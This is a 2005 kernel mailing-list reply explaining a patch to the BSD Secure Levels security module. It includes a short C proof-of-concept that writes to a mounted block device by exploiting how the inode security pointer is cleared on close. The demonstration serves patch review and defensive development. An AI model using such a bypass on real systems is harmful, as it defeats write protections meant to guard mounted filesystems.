On Mon, Feb 07, 2005 at 02:26:03PM -0800, Chris Wright wrote: > * Michael Halcrow ([EMAIL PROTECTED]) wrote: > > This is the third in a series of eight patches to the BSD Secure > > Levels LSM. It moves the claim on the block device from the inode > > struct to the file struct in order to address a potential > > circumvention of the control via hard links to block devices. Thanks > > to Serge Hallyn for pointing this out. > > Hard links still point to same inode, what's the issue that this > addresses?
Actually, it turns out that hard links have nothing to do with the
vulnerability that this patch addresses:
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
int main()
{
int fd1, fd2;
int rc;
fd1 = open( "/dev/device", O_RDONLY );
fd2 = open( "/dev/device", O_RDWR );
close(fd1);
getchar();
rc = write( fd2, "0", 1 );
printf( "write result: [%d]\n", rc );
close( fd2 );
return 0;
}
While the program is waiting for a keystroke, mount the block device.
Enter a keystroke. The result without the patch is 1, which is a
security violation. This occurs because the bd_release function will
bd_release(bdev) and set inode->i_security to NULL on the close(fd1).
Hence, we want to place the control at the level of the file struct,
not the inode.
Mike
.___________________________________________________________________.
Michael A. Halcrow
Security Software Engineer, IBM Linux Technology Center
GnuPG Fingerprint: 05B5 08A8 713A 64C1 D35D 2371 2D3C FDDA 3EB6 601D
The hokey pokey... What if that's really what it's all about?
signature.asc
Description: Digital signature
